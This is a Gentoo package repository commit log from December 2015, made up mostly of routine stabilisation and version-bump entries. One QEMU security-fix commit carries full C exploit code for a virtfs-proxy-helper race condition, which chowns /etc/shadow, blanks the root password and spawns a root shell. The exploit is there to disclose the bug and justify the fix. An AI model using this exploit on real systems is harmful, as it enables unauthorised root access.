summaryrefslogtreecommitdiff
Commit message (Collapse)AuthorAge
* dev-ruby/pkg-config: amd64 stable wrt bug #568042Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-php/PEAR-Mail_Mime: amd64 stable wrt bug #567994Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* media-video/mkvtoolnix: amd64 stable wrt bug #562484Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-i18n/im-freewnn: amd64 stable wrt bug #566230Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-python/oslotest: amd64 stable wrt bug #568022Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-ruby/ruby-ldap: amd64 stable wrt bug #568110Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-libs/libnl: amd64 stable wrt bug #568052Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-ruby/ruby-opengl: amd64 stable wrt bug #568114Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/vice: amd64 stable wrt bug #568078Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-ruby/rdoc: amd64 stable wrt bug #568044Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* games-util/nml: amd64 stable wrt bug #568074Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* games-engines/stratagus: amd64 stable wrt bug #568076Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-ruby/narray: amd64 stable wrt bug #568040Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-ruby/ruby-openid: amd64 stable wrt bug #568118Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-emulation/xen: amd64 stable wrt bug #566842Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* dev-ruby/rrdtool-bindings: amd64 stable wrt bug #567586Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* net-analyzer/rrdtool: amd64 stable wrt bug #567586Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* app-text/docbook-xsl-stylesheets: amd64 stable wrt bug #568160Agostino Sarubbo2015-12-14
| | | | | | Package-Manager: portage-2.2.24 RepoMan-Options: --include-arches="amd64" Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
* kde-misc/rsibreak: version bumpAndreas Sturmlechner2015-12-15
| | | | Package-Manager: portage-2.2.26
* media-gfx/symboleditor: version bumpAndreas Sturmlechner2015-12-15
| | | | Package-Manager: portage-2.2.26
* media-gfx/symboleditor: shorten DESCRIPTION to fit within 80-character guidelineMichael Palimaka2015-12-15
| | | | Package-Manager: portage-2.2.26
* kde-base: Add >=cmake-3.4 configure fix for KDE PIMAndreas Sturmlechner2015-12-15
| | | | | | | See also: https://bugs.gentoo.org/show_bug.cgi?id=566058 Tested-by: Vadim Package-Manager: portage-2.2.24
* media-video/kamoso: version bumpMichael Palimaka2015-12-15
| | | | Package-Manager: portage-2.2.26
* www-servers/apache: Raised minimum required version of nghttp2Lars Wendler2015-12-14
| | | | | | | to version 1.2.1 as reuqested in bug #568224 Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* app-text/docbook-xsl-stylesheets: Fixed homepage variable in ebuilds.Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* sys-kernel/git-sources: Linux patch 4.4_rc5Mike Pagano2015-12-14
| | | | Package-Manager: portage-2.2.24
* app-emulation/qemu: critical security fixJason A. Donenfeld2015-12-14
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | The virtfs-proxy-helper program is not a safe binary to give caps. The following exploit code demonstrates the vulnerability: ~=~=~=~= snip ~=~=~=~= /* == virtfshell == * * Some distributions make virtfs-proxy-helper from QEMU either SUID or * give it CAP_CHOWN fs capabilities. This is a terrible idea. While * virtfs-proxy-helper makes some sort of flimsy check to make sure * its socket path doesn't already exist, it is vulnerable to TOCTOU. * * This should spawn a root shell eventually on vulnerable systems. * * - zx2c4 * 2015-12-12 * * * zx2c4@thinkpad ~ $ lsb_release -i * Distributor ID: Gentoo * zx2c4@thinkpad ~ $ ./virtfshell * == Virtfshell - by zx2c4 == * [+] Beginning race loop * [+] Chown'd /etc/shadow, elevating to root * [+] Cleaning up * [+] Spawning root shell * thinkpad zx2c4 # whoami * root * */ #include <stdio.h> #include <sys/wait.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/inotify.h> #include <unistd.h> #include <stdlib.h> #include <signal.h> static int it_worked(void) { struct stat sbuf = { 0 }; stat("/etc/shadow", &sbuf); return sbuf.st_uid == getuid() && sbuf.st_gid == getgid(); } int main(int argc, char **argv) { int fd; pid_t pid; char uid[12], gid[12]; sprintf(uid, "%d", getuid()); sprintf(gid, "%d", getgid()); printf("== Virtfshell - by zx2c4 ==\n"); printf("[+] Beginning race loop\n"); while (!it_worked()) { fd = inotify_init(); unlink("/tmp/virtfshell/sock"); mkdir("/tmp/virtfshell", 0777); inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE); pid = fork(); if (!pid) { close(0); close(1); close(2); execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL); _exit(1); } read(fd, 0, 0); unlink("/tmp/virtfshell/sock"); symlink("/etc/shadow", "/tmp/virtfshell/sock"); close(fd); kill(pid, SIGKILL); wait(NULL); } printf("[+] Chown'd /etc/shadow, elevating to root\n"); system( "cp /etc/shadow /tmp/original_shadow;" "sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;" "cat /tmp/modified_shadow > /etc/shadow;" "su -c '" " echo [+] Cleaning up;" " cat /tmp/original_shadow > /etc/shadow;" " chown root:root /etc/shadow;" " rm /tmp/modified_shadow /tmp/original_shadow;" " echo [+] Spawning root shell;" " exec /bin/bash -i" "'"); return 0; }
* dev-perl/Pod-POM: Version bump.Patrice Clement2015-12-14
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Patrice Clement <monsieurp@gentoo.org>
* dev-perl/File-Slurper: Initial commitPatrice Clement2015-12-14
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Patrice Clement <monsieurp@gentoo.org>
* dev-perl/Math-Random-MT: Clean up old.Patrice Clement2015-12-14
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Patrice Clement <monsieurp@gentoo.org>
* dev-perl/Math-BigInt-GMP: Version bump.Patrice Clement2015-12-14
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Patrice Clement <monsieurp@gentoo.org>
* dev-perl/Math-Random-MT: Version bump.Patrice Clement2015-12-14
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Patrice Clement <monsieurp@gentoo.org>
* net-dns/nsd: Bump to versions 3.2.20 and 4.1.7 (bug #541036).Lars Wendler2015-12-14
| | | | | | | Proxy commit for Tom Hendrikx. Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* app-arch/pbzip2: Removed old.Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* app-arch/pbzip2: Revbump to fix possible data corruption (#567952).Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* sys-process/numactl: Removed old.Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* sys-process/numactl: Bump to version 2.0.11Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* dev-java/rngom: Version bump.Patrice Clement2015-12-14
| | | | | Package-Manager: portage-2.2.20.1 Signed-off-by: Patrice Clement <monsieurp@gentoo.org>
* dev-python/cvxopt: Version BumpJustin Lecher2015-12-14
| | | | | | | Gentoo-Bug: https://bugs.gentoo.org/show_bug.cgi?id=521210 Package-Manager: portage-2.2.26 Signed-off-by: Justin Lecher <jlec@gentoo.org>
* package.mask: Removed mask of apache-2.4.17Lars Wendler2015-12-14
| | | | Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* app-admin/apache-tools: Removed old.Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* www-servers/apache: Removed old.Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* app-admin/apache-tools: Bump to version 2.4.18Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* www-servers/apache: Bump to version 2.4.18Lars Wendler2015-12-14
| | | | | Package-Manager: portage-2.2.26 Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* apache-2.eclass: Fixed broken URL.Lars Wendler2015-12-14
| | | | Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>
* sys-apps/hwids: stable on amd64, bug #568082Anthony G. Basile2015-12-14
| | | | Package-Manager: portage-2.2.24
* virtual/libgudev: stable on amd64, bug #568082Anthony G. Basile2015-12-14
| | | | Package-Manager: portage-2.2.24
* dev-libs/libgudev: stable on amd64, bug #568082Anthony G. Basile2015-12-14
| | | | Package-Manager: portage-2.2.24
* net-p2p/gtk-gnutella: add 1.1.7Hans de Graaff2015-12-14
| | | | Package-Manager: portage-2.2.24
* net-p2p/gtk-gnutella: cleanupHans de Graaff2015-12-14
| | | | Package-Manager: portage-2.2.24